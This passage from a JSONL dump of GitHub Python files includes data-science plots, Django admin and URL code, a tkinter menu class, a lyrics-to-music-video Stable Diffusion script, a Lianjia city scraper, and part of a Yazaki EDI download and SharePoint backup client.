"call"}]} +{"seq_id": "9019832215", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\ndata = np.loadtxt('C:\\\\Users\\\\win10\\\\Desktop\\\\num.txt', encoding = 'cp860')\nunique, counts = np.unique(data, return_counts = True)\nprint(unique, counts)\nplt.hist(data);\n\nnum_sixes = (data == 6).sum()\nnum_total = data.size\nnum_sixes\nnum_total\n\nfrom scipy.stats import binom\nn = np.arange(num_total)\nprob_n = binom.pmf(n, num_total, 1/6)\nplt.plot(n, prob_n, label='Prob num')\nplt.axvline(num_total / 6, ls ='--', lw=1, label=\"Mean num\")\nplt.axvline(num_sixes, ls=\":\", color = \"#ff7272\", label = \"Obs num\")\nplt.xlabel(f\"Num sixes rolled out of {num_total} rolls\")\nplt.ylabel(\"Probability\")\nplt.legend();\nprint(f\"Num sixes rolled out of {num_total} rolls\")\n\nd = binom(num_total, 1/6)\nplt.plot(n, d.sf(n))\nplt.axvline(num_sixes, ls=\"--\")\nsf = d.sf(num_sixes)\nplt.xlabel(\"Num sixes\")\nplt.ylabel(\"SF\")\nprint(f\" Only {sf * 100:.1f}% of the time with a fair dice you'd roll thie many or more sixes.\")\n\n\n", "repo_name": "jhaneto/jhan", "sub_path": "Curso_Formcao_DS/exemplo1.py", "file_name": "exemplo1.py", "file_ext": "py", "file_size_in_byte": 946, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.loadtxt", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.stats.binom.pmf", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.stats.binom", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "scipy.stats.binom", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "16271157526", "text": "from django.contrib import admin\nfrom django.utils.html import format_html\nfrom django.urls import reverse, NoReverseMatch\nfrom .models import AcmeChallenge\n\n\nclass AcmeChallengeAdmin(admin.ModelAdmin):\n def format_acme_url(self, acme_object):\n try:\n object_url = reverse(viewname='acmechallenge-response', args=(acme_object.challenge, ))\n return format_html(\"ACME Challenge Link\", object_url)\n except NoReverseMatch:\n return '-'\n format_acme_url.short_description = 'Link'\n\n fieldsets = [\n ('ACME Request', {\n 'fields': [\n 'challenge',\n 'response',\n ],\n }),\n ('Metadata', {\n 'fields': [\n 'id',\n 'format_acme_url',\n ],\n }),\n ]\n\n list_display = ['challenge', 'format_acme_url']\n ordering = ['challenge']\n readonly_fields = ['id', 'format_acme_url']\n search_fields = ['challenge', 'response']\n\n\nadmin.site.register(AcmeChallenge, AcmeChallengeAdmin)\n", "repo_name": "lukehuang/certbot-django", "sub_path": "src/certbot_django/server/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 1068, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 10, "usage_type": "call"}, {"api_name": "django.utils.html.format_html", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.NoReverseMatch", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 37, "usage_type": "call"}, {"api_name": "models.AcmeChallenge", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "5884233634", "text": "from sys import version_info\nif version_info.major >= 3: import tkinter as tk\nelse: import Tkinter as tk\n\nfrom lib.hotkeys import Hotkeys\nfrom hotkeyslist import hotkeyslist\nfrom functions.hotkeystostring import hotkeys_to_string\n\nclass Menu(tk.Menu, object):\n def __init__(self,master,root,*args,**kwargs):\n self.states = {}\n super(Menu,self).__init__(master,*args,**kwargs)\n\n self.hotkeys = Hotkeys(root)\n self.index = 0\n \n def add_command(self,label,*args,**kwargs):\n hotkey = kwargs.pop('hotkey',None)\n command = kwargs.get('command', None)\n bind = kwargs.pop('bind',True)\n\n if hotkey is not None and command is not None:\n if bind: self.hotkeys.bind(hotkey, command)\n kwargs['accelerator'] = hotkeys_to_string(hotkey).replace(\"(\",\"\").replace(\")\",\"\")\n \n state = kwargs.get('state','normal')\n kwargs['state'] = state\n \n if kwargs.pop('can_disable', True):\n self.states[label] = {'state':state, 'hotkey':hotkey}\n if state == 'disabled' and hotkey is not None:\n if self.hotkeys.is_bound(hotkey): self.hotkeys.disable(hotkey)\n\n kwargs['label'] = label\n super(Menu,self).add_command(*args,**kwargs)\n self.index += 1\n\n def add_checkbutton(self, label, *args, **kwargs):\n hotkey = kwargs.pop('hotkey',None)\n command = kwargs.get('command', None)\n bind = kwargs.pop('bind',True)\n\n if hotkey is not None and command is not None:\n if bind: self.hotkeys.bind(hotkey, command)\n kwargs['accelerator'] = hotkeys_to_string(hotkey).replace(\"(\",\"\").replace(\")\",\"\")\n \n state = kwargs.get('state','normal')\n kwargs['state'] = state\n \n if kwargs.pop('can_disable', True):\n self.states[label] = {'state':state, 'hotkey':hotkey}\n if state == 'disabled' and hotkey is not None:\n if self.hotkeys.is_bound(hotkey): self.hotkeys.disable(hotkey)\n\n kwargs['label'] = label\n super(Menu,self).add_checkbutton(*args,**kwargs)\n self.index += 1\n\n def insert_separator(self):\n super(Menu,self).insert_separator(self.index)\n self.index += 1\n\n def set_state(self, state, label=None):\n if label is None:\n for l, s in self.states.items():\n self.states[l]['state'] = state\n self.entryconfig(l,state=state)\n if s['hotkey'] is not None and self.hotkeys.is_bound(s['hotkey']):\n if state == 'disabled': self.hotkeys.disable(s['hotkey'])\n elif state == 'normal' : self.hotkeys.enable(s['hotkey'])\n else:\n self.states[label]['state'] = state\n self.entryconfig(label,state=state)\n if self.states[label]['hotkey'] is not None and self.hotkeys.is_bound(s['hotkey']):\n if state == 'disabled': self.hotkeys.disable(self.states[label]['hotkey'])\n elif state == 'normal' : self.hotkeys.enable(self.states[label]['hotkey'])\n \n\n def disable(self,event=None,label=None):\n self.set_state('disabled',label=label)\n\n def enable(self,event=None,label=None):\n self.set_state('normal',label=label)\n \n", "repo_name": "hatfullr/pysplash", "sub_path": "gui/menubar/menu.py", "file_name": "menu.py", "file_ext": "py", "file_size_in_byte": 3300, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.version_info.major", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.version_info", "line_number": 2, "usage_type": "name"}, {"api_name": "Tkinter.Menu", "line_number": 9, "usage_type": "attribute"}, {"api_name": "lib.hotkeys.Hotkeys", "line_number": 14, "usage_type": "call"}, {"api_name": "functions.hotkeystostring.hotkeys_to_string", "line_number": 24, "usage_type": "call"}, {"api_name": "functions.hotkeystostring.hotkeys_to_string", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "33658806611", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import multivariate_normal\n\n# 定義參數\nmu = np.array([2, 3]) # 平均值\ncov_matrix = np.array([[1, 0.5], [0.5, 2]]) # 協方差矩陣\n\n# 建立網格\nx, y = np.meshgrid(np.linspace(-5, 8, 100), np.linspace(-5, 8, 100))\npos = np.dstack((x, y))\n\n# 計算高斯分布\nrv = multivariate_normal(mu, cov_matrix)\nz = rv.pdf(pos)\n\n# 繪製等高線圖\nplt.contourf(x, y, z, cmap='viridis')\nplt.xlabel('X')\nplt.ylabel('Y')\nplt.title('2D Gaussian Distribution')\nplt.colorbar()\nplt.show()\n", "repo_name": "evan20010126/Deep_learning", "sub_path": "two_dimensional_gaussian.py", "file_name": "two_dimensional_gaussian.py", "file_ext": "py", "file_size_in_byte": 557, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 11, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "75363124324", "text": "import datetime\nimport time\nimport ffmpeg\nimport glob\nimport webvtt\nimport copy\nimport random\nimport sys\nimport traceback\nimport shlex\nimport os\nfrom PIL import Image\nfrom typing import List\nfrom scripts.Transcriber import Transcriber\nfrom scripts.WhisperTranscriber import WhisperTranscriber\nfrom scripts.VideoGenerator import VideoGenerator\nfrom scripts.BasicVideoGenerator import BasicVideoGenerator\nfrom scripts.GPTImageDescriber import GPTImageDescriber\nfrom scripts.PromptRefiner import PromptRefiner\nfrom scripts.YoutubeDownloader import YoutubeDownloader\n\n\nimport modules.scripts as scripts\nimport gradio as gr\n\nfrom modules import sd_samplers\nfrom modules.processing import Processed, process_images\nfrom modules.shared import state\n\nBASE_PATH = f\"{scripts.basedir()}\"\nprint(f\"BASE PATH: {BASE_PATH}\")\n\n# Set the used transcriber!\ntranscriber: Transcriber = WhisperTranscriber(BASE_PATH)\ngenerator: VideoGenerator = BasicVideoGenerator()\n\n# Create the processing stack\nprocessing_stack: List[PromptRefiner] = []\nprocessing_stack.append(GPTImageDescriber())\n\nyt_scraper: YoutubeDownloader = YoutubeDownloader()\n\ndef process_string_tag(tag):\n return tag\n\ndef process_int_tag(tag):\n return int(tag)\n\ndef process_float_tag(tag):\n return float(tag)\n\ndef process_boolean_tag(tag):\n return True if (tag == \"true\") else False\n\ndef get_captions_from_file():\n text_files = glob.glob(BASE_PATH+\"/temp/*.txt\", recursive=False)\n if(len(text_files)!=1):\n raise Exception(f\"Found {len(text_files)} txt file(s) in {BASE_PATH}/temp/*.txt, expected 1\")\n with open(text_files[0], encoding=\"utf8\") as f:\n lines = f.readlines()\n return \" \".join(lines)\n\nprompt_tags = {\n \"sd_model\": None,\n \"outpath_samples\": process_string_tag,\n \"outpath_grids\": process_string_tag,\n \"prompt_for_display\": process_string_tag,\n \"prompt\": process_string_tag,\n \"negative_prompt\": process_string_tag,\n \"styles\": process_string_tag,\n \"seed\": process_int_tag,\n \"subseed_strength\": process_float_tag,\n \"subseed\": process_int_tag,\n \"seed_resize_from_h\": process_int_tag,\n \"seed_resize_from_w\": process_int_tag,\n \"sampler_index\": process_int_tag,\n \"sampler_name\": process_string_tag,\n \"batch_size\": process_int_tag,\n \"n_iter\": process_int_tag,\n \"steps\": process_int_tag,\n \"cfg_scale\": process_float_tag,\n \"width\": process_int_tag,\n \"height\": process_int_tag,\n \"restore_faces\": process_boolean_tag,\n \"tiling\": process_boolean_tag,\n \"do_not_save_samples\": process_boolean_tag,\n \"do_not_save_grid\": process_boolean_tag\n}\n\ndef wipe_directory(directory_path: str):\n # Check if the directory exists\n if not os.path.isdir(directory_path):\n print(f\"Directory '{directory_path}' does not exist.\")\n return\n \n def is_important_file(path):\n importaint_files = ['.py', '.mov', '.mp4', '.exe', '.dll']\n _, extension = os.path.splitext(path)\n return extension in importaint_files\n \n # Iterate over all files in the directory\n for filename in os.listdir(directory_path):\n file_path = os.path.join(directory_path, filename)\n \n # Do not remove important files\n if(is_important_file(file_path)):\n continue\n\n # Check if the current path is a file\n if os.path.isfile(file_path):\n try:\n os.remove(file_path)\n print(f\"Successfully removed file: {file_path}\")\n except Exception as e:\n print(f\"Error occurred while removing file: {file_path}\")\n print(f\"Error message: {str(e)}\")\n\n\nclass Script(scripts.Script):\n def title(self):\n return \"Generates a music video from a song file\"\n\n def transcribe_and_update(self, audio: str, translate: bool, prompt_txt):\n transcriber.transcribe_audio_file(audio, translate)\n return get_captions_from_file()\n \n\n def ui(self, is_img2img):\n \n def update_value(url):\n self.yt_url = url\n return url\n def scrape_video():\n try:\n self.yt_url\n except:\n raise Exception(f\"No youtube video selected!\")\n print(f\"URL: {self.yt_url}\")\n yt_scraper.download_all(self.yt_url, f\"{BASE_PATH}/temp\")\n return get_captions_from_file()\n\n yt_video_input: gr.Textbox = gr.Textbox(label=\"Get audio and subtitles from a youtube video\", lines = 1, elem_id=self.elem_id(\"yt_video_url\"))\n\n with gr.Row(variant=\"compact\", elem_id=\"apply_button_row\"):\n yt_video_apply_btn = gr.Button(value=\"Get audio and captions from yt video\", elem_id=\"run_crawler_btn\")\n \n \n\n checkbox_gpt_refinement = gr.Checkbox(label=\"Let gpt refine the prompts\", value=True, elem_id=self.elem_id(\"checkbox_gpt_refinement\"))\n checkbox_translate = gr.Checkbox(label=\"Translate lyrics to english\", value=False, elem_id=self.elem_id(\"checkbox_translate\"))\n audio = gr.File(label=\"Audio file\", type='binary', elem_id=self.elem_id(\"audio_file\"))\n prompt_txt = gr.Textbox(label=\"Lyrics used for generation\", lines=1, elem_id=self.elem_id(\"prompt_txt\"))\n gpt_context_txt = gr.Textbox(label=\"Additional gpt context for image generation\", lines=4, elem_id=self.elem_id(\"gpt_context_txt\"))\n \n \n yt_video_apply_btn.click(scrape_video, inputs=[], outputs=[prompt_txt])\n audio.change(fn=self.transcribe_and_update, inputs=[audio, checkbox_translate, prompt_txt], outputs=[prompt_txt], show_progress=False)\n \n prompt_txt.change(lambda tb: gr.update(lines=7) if (\"\\n\" in tb) else gr.update(lines=2), inputs=[prompt_txt], outputs=[prompt_txt], show_progress=False)\n gpt_context_txt.change(lambda tb: gr.update(lines=7) if (\"\\n\" in tb) else gr.update(lines=4), inputs=[gpt_context_txt], outputs=[gpt_context_txt], show_progress=False)\n \n yt_video_input.change(lambda tb: update_value(str(tb)), inputs=[yt_video_input], outputs=[yt_video_input], show_progress=False)\n return [prompt_txt, checkbox_gpt_refinement, checkbox_translate, yt_video_input, gpt_context_txt]\n\n def run(self, p, prompt_txt: str, checkbox_gpt_refinement, checkbox_translate, yt_video_input, gpt_context_txt):\n options = {\n 'checkbox_gpt_refinement': checkbox_gpt_refinement,\n 'gpt_context': gpt_context_txt\n }\n \n print(f\"GENERATING USING THE TEXT PROMPT: \\n{p.prompt}\\n\\n and description: {prompt_txt}\")\n print(f\"And additional context: {gpt_context_txt}\")\n abc = prompt_tags.get(\"negative_prompt\")\n print(f\"PROMPT: {abc}\")\n lines = [x.strip() for x in prompt_txt.splitlines()]\n lines = [x for x in lines if len(x) > 0]\n \n # Convert the lyrics into images by running them through\n # a number of refiners\n try:\n for refiner in processing_stack:\n lines = refiner.refine(lines, options)\n # TODO Insert p.prompt in the beginning of all lines.\n for i in range(len(lines)):\n lines[i] = f\"{p.prompt}, {lines[i]}\" \n except Exception as e:\n print(\"Failed to refine the pompts: \" + str(e))\n raise\n\n p.do_not_save_grid = True\n\n job_count = 0\n jobs = []\n\n for line in lines:\n \n args = {\"prompt\": line}\n\n job_count += args.get(\"n_iter\", p.n_iter)\n\n jobs.append(args)\n\n print(f\"Will process {len(lines)} images in {job_count} jobs.\")\n\n state.job_count = job_count\n\n images = []\n all_prompts = []\n infotexts = []\n for args in jobs:\n state.job = f\"{state.job_no + 1} out of {state.job_count}\"\n\n copy_p = copy.copy(p)\n for k, v in args.items():\n setattr(copy_p, k, v)\n\n proc = process_images(copy_p)\n images += proc.images\n\n all_prompts += proc.all_prompts\n infotexts += proc.infotexts\n\n # Save images in a temp foler\n print(f\"SAVING {len(images)} images in temp folder\")\n i = 0\n for elm in images:\n img: Image = elm\n file_path = f\"{BASE_PATH}/temp/{str(i).zfill(5)}.png\"\n img.save(file_path)\n i+=1\n\n # GENERATE THE VIDEO\n try:\n temp_folder:str = f\"{BASE_PATH}/temp\"\n generator.generate_video(temp_folder)\n wipe_directory(temp_folder)\n \n except Exception as e:\n print(\"Failed to generate the video: \", str(e))\n return Processed(p, images, p.seed, \"\", all_prompts=all_prompts, infotexts=infotexts)\n\n", "repo_name": "pad918/stable-diffusion-mv-generator", "sub_path": "scripts/Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 8791, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "modules.scripts.basedir", "line_number": 30, "usage_type": "call"}, {"api_name": "modules.scripts", "line_number": 30, "usage_type": "name"}, {"api_name": "scripts.Transcriber.Transcriber", "line_number": 34, "usage_type": "name"}, {"api_name": "scripts.WhisperTranscriber.WhisperTranscriber", "line_number": 34, "usage_type": "call"}, {"api_name": "scripts.VideoGenerator.VideoGenerator", "line_number": 35, "usage_type": "name"}, {"api_name": "scripts.BasicVideoGenerator.BasicVideoGenerator", "line_number": 35, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}, {"api_name": "scripts.PromptRefiner.PromptRefiner", "line_number": 38, "usage_type": "name"}, {"api_name": "scripts.GPTImageDescriber.GPTImageDescriber", "line_number": 39, "usage_type": "call"}, {"api_name": "scripts.YoutubeDownloader.YoutubeDownloader", "line_number": 41, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 112, "usage_type": "call"}, {"api_name": "modules.scripts.Script", "line_number": 119, "usage_type": "attribute"}, {"api_name": "modules.scripts", "line_number": 119, "usage_type": "name"}, {"api_name": "gradio.Textbox", "line_number": 142, "usage_type": "attribute"}, {"api_name": "gradio.Row", "line_number": 144, "usage_type": "call"}, {"api_name": "gradio.Button", "line_number": 145, "usage_type": "call"}, {"api_name": "gradio.Checkbox", "line_number": 149, "usage_type": "call"}, {"api_name": "gradio.Checkbox", "line_number": 150, "usage_type": "call"}, {"api_name": "gradio.File", "line_number": 151, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 152, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 153, "usage_type": "call"}, {"api_name": "gradio.update", "line_number": 159, "usage_type": "call"}, {"api_name": "gradio.update", "line_number": 160, "usage_type": "call"}, {"api_name": "modules.shared.state.job_count", "line_number": 205, "usage_type": "attribute"}, {"api_name": "modules.shared.state", "line_number": 205, "usage_type": "name"}, {"api_name": "modules.shared.state.job", "line_number": 211, "usage_type": "attribute"}, {"api_name": "modules.shared.state", "line_number": 211, "usage_type": "name"}, {"api_name": "modules.shared.state.job_no", "line_number": 211, "usage_type": "attribute"}, {"api_name": "modules.shared.state.job_count", "line_number": 211, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 213, "usage_type": "call"}, {"api_name": "modules.processing.process_images", "line_number": 217, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 227, "usage_type": "name"}, {"api_name": "modules.processing.Processed", "line_number": 240, "usage_type": "call"}]} +{"seq_id": "10595790242", "text": "from rest_framework import routers\nfrom django.conf.urls import url, include\nfrom . import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'CarMake', views.MakeView)\nrouter.register(r'CarModel', views.ModelView)\n# router.register(r'Review', views.ReviewView)\nrouter.register(r'User', views.UserView)\n\nurlpatterns = [\n url(r'^login$', views.login_user, name='login'),\n url(r'^register$', views.register_user, name='register'),\n url(r'^', include(router.urls)),\n url(r'api-auth/', include('rest_framework.urls'))\n]\n", "repo_name": "DamonRomano/backEndCapstone", "sub_path": "car_sort_project/server/car_sort_app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 534, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 5, "usage_type": "call"}, {"api_name": "rest_framework.routers", "line_number": 5, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "36764252808", "text": "# encoding: utf-8\nimport logging\nfrom config.config import config\nfrom utils.client import get_data\nfrom models.orm import Session\nfrom models.city import City\n\ndef get_city_list():\n \"\"\"\n 获取城市列表\n \"\"\"\n url = 'http://app.api.lianjia.com/config/config/initData'\n\n payload = {\n 'params': '{{\"city_id\": {}, \"mobile_type\": \"android\", \"version\": \"8.0.1\"}}'.format('110000'),\n 'fields': '{ \"city_config_all\": \"\"}'\n }\n logging.info('开始更新城市列表')\n data = get_data(url, payload, method='POST')\n db_session = Session()\n for a_city in data['city_config_all']['list']:\n city = City(a_city)\n db_session.merge(city)\n db_session.commit()\n db_session.close()\n logging.info('城市列表更新完成,数据表名称:{}'.format(City.__tablename__))\n\ndef main():\n get_city_list()\n\n\nif __name__ == '__main__':\n main()", "repo_name": "yinghuochong/BestHouse", "sub_path": "get_cities.py", "file_name": "get_cities.py", "file_ext": "py", "file_size_in_byte": 896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.info", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.client.get_data", "line_number": 19, "usage_type": "call"}, {"api_name": "models.orm.Session", "line_number": 20, "usage_type": "call"}, {"api_name": "models.city.City", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 26, "usage_type": "call"}, {"api_name": "models.city.City.__tablename__", "line_number": 26, "usage_type": "attribute"}, {"api_name": "models.city.City", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "8809495654", "text": "import json\nimport urllib\nimport aiohttp\nimport urllib3\nimport requests\nimport os\nfrom termcolor import colored\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime, timedelta\nfrom shareplum import Office365\nfrom shareplum import Site\nfrom shareplum.site import Version\n\nclass LogActivity:\n def __init__(self, name='CK', subject=None, status='Active', message=None):\n d = datetime.now().strftime('%Y%m%d')\n path = f\"LOGS/{d}\"\n if os.path.exists(path) is False:os.makedirs(path)\n filename = f\"{path}/{name}-{d}.log\"\n f = open(filename, 'a+')\n txt = f\"{str(datetime.now().strftime('%Y%m%d %H:%M:%S')).ljust(25)}SUBJECT: {str(subject).ljust(20)}STATUS: {str(status).ljust(10)}MESSAGE: {str(message).ljust(50)}\"\n f.write(f\"{txt}\\n\")\n f.close()\n\nclass SplSharePoint:\n def __init__(self, url, site, username, password):\n self.url = url\n self.site = site\n self.username = username\n self.password = password\n \n def upload(self, pathname, filename, destination=\"Temp\"):\n try:\n authcookie = Office365(self.url, username=self.username, password=self.password).GetCookies()\n site = Site(f'{self.url}/sites/{self.site}', version=Version.v365, authcookie=authcookie);\n folder = site.Folder(f'Shared Documents/{destination}')\n with open(pathname, mode='rb') as file:\n fileContent = file.read()\n \n folder.upload_file(fileContent, filename)\n LogActivity(name=\"SPL\", subject=\"SHAREPOINT\", status=\"Success\", message=f\"Backup GEDI({filename})\")\n \n except Exception as e:\n LogActivity(name=\"SPL\", subject=\"SHAREPOINT\", status=\"Error\", message=str(e))\n pass\n\nclass ObjectLink:\n def __init__(\n self,\n host,\n objtype,\n mailbox,\n batchid,\n size,\n batchfile,\n currentdate,\n flags,\n formats,\n orgname,\n download=False,\n pathname=\"EXPORT\"\n ):\n # import os\n from datetime import datetime\n\n ordn = None\n bf = 0\n filetype = \"RECEIVE\"\n factory = \"INJ\"\n\n if objtype == \"RMW\":\n ordn = str(batchfile).strip()\n factory = \"RMW\"\n filename = \"\"\n if ordn[:3] == \"OES\":\n filename = ordn[len(\"OES.32TE.SPL.\"):]\n else:\n filename = ordn[len(\"NRRIS.32TE.SPL.\"):]\n\n filename = filename[: filename.find(\".\")].upper()\n if filename == \"ISSUELIST\":\n filetype = \"CONLOT\"\n\n elif filename == \"ISSUENO\":\n filetype = \"KANBAN\"\n\n else:\n filetype = \"RECEIVE\"\n\n elif objtype == \"CK2\":\n ordn = str(batchfile[: len(\"OES.VCBI\")]).strip()\n bf = int(str(batchfile[len(\"OES.VCBI\") + 3:])[1:2].strip())\n filetype = \"RECEIVE\"\n if ordn == \"OES.VCBI\":\n filetype = \"ORDERPLAN\"\n\n factory = \"INJ\"\n if bf == 4:\n factory = \"AW\"\n\n elif objtype == \"J03\":\n print(\"J03\")\n\n elif objtype == \"FG\":\n print(\"FG\")\n\n else:\n print(\"UNKNOW\")\n\n self.objtype = objtype\n self.mailbox = mailbox\n self.batchid = batchid\n self.size = size\n self.batchfile = batchfile\n self.currentdate = datetime.strptime(currentdate, \"%b %d, %Y %I:%M %p\")\n self.flags = flags\n self.formats = formats\n self.orgname = orgname\n self.factory = factory\n self.filetype = filetype\n self.download = download\n self.destination = f'{pathname}/{filetype}/{(self.currentdate).strftime(\"%Y%m%d\")}'\n self.linkfile = f\"{host}/cehttp/servlet/MailboxServlet?operation=DOWNLOAD&mailbox_id={self.mailbox}&batch_num={self.batchid}&data_format=A&batch_id={self.batchfile}\"\n\n\nclass Yazaki:\n def __init__(self, service_type=\"CK2\", host=\"https://218.225.124.157:9443\", username=None, password=None):\n self.service_type = service_type\n self.host = host\n self.username = username\n self.password = password\n\n # @staticmethod\n def login(self):\n response = False\n try:\n # login yazaki website.\n url = f\"{self.host}/cehttp/servlet/MailboxServlet\"\n passwd = urllib.parse.quote(self.password)\n payload = (\n f\"operation=LOGON&remote={self.username}&password={passwd}\"\n )\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n urllib3.disable_warnings()\n response = requests.request(\n \"POST\", url, headers=headers, verify=False, data=payload, timeout=3)\n\n txt = None\n docs = BeautifulSoup(response.text, \"html.parser\")\n for i in docs.find_all(\"hr\"):\n txt = (i.previous).replace(\"\\n\", \"\")\n\n _txt_status = \"Success\"\n if txt.find(\"751\") >= 0:\n _txt_status = \"Error\"\n response = False\n\n LogActivity(subject=\"LOGIN\", status=_txt_status, message=str(txt))\n\n except Exception as msg:\n LogActivity(subject=\"LOGIN\", status='Error', message=str(msg))\n pass\n\n return response\n\n def logout(self, session):\n response = True\n try:\n url = f\"{self.host}/cehttp/servlet/MailboxServlet?operation=LOGOFF\"\n headers = {}\n payload = {}\n rq = requests.request(\n \"POST\",\n url,\n data=payload,\n headers=headers,\n verify=False,\n timeout=3,\n cookies=session.cookies,\n )\n\n docs = BeautifulSoup(rq.text, \"html.parser\")\n for i in docs.find_all(\"hr\"):\n txt = 